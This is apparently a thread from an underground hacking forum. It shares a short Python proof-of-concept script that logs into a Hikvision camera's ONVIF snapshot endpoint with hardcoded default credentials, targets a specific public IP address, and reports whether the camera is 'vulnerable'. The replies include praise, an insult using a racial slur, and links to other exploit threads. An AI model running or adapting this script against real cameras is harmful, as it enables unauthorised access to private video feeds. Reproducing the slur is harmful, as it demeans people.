Hikevision camera POC
by Mr_subProcess - Saturday March 22, 2025 at 12:49 PM
#1
import requests
from requests.auth import HTTPBasicAuth

#ip=input("Give me hikevision camera ip: ")
ip= "175.203.236.153:80"
url ="http://"
url2="/onvif-http/snapshot?auth=YWRtaW46MTEK"
target_url= url[:7] + ip + url2
print (target_url)
user = "admin"
password="11"

def main():
    try:
        response = requests.get(target_url, auth=HTTPBasicAuth(user, password), timeout=5)
        if response.status_code == 200 :
            print ("Camera is vulnerable" )
        else:
            print("Camera is not vulnerable")
    except Exception as x:
        print("Error: " ,x)

main()
Reply
#2
damn, that script is fire

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#3
Niggga, this shit is garbage man.. go back to school
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  New Zer0 Day Wordpress A3g00n 80 3,167 2 hours ago
Last Post: pegaz
  Wordpress Elementor 3.11.6 Exploit - Full Takeover TheGoodlife 102 19,585 Today, 06:45 AM
Last Post: eztocard
  {SECRET} DATABASE OF EXPLOITS lulagain 434 26,085 May 02, 2026, 01:40 PM
Last Post: rootofhunter
  new wordpress website takeover vuln (video + poc ) zinzeur 314 28,254 Apr 30, 2026, 03:54 PM
Last Post: baku
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 66 3,139 Apr 29, 2026, 08:51 PM
Last Post: Yjuddur

Forum Jump:


 Users browsing this forum: 1 Guest(s)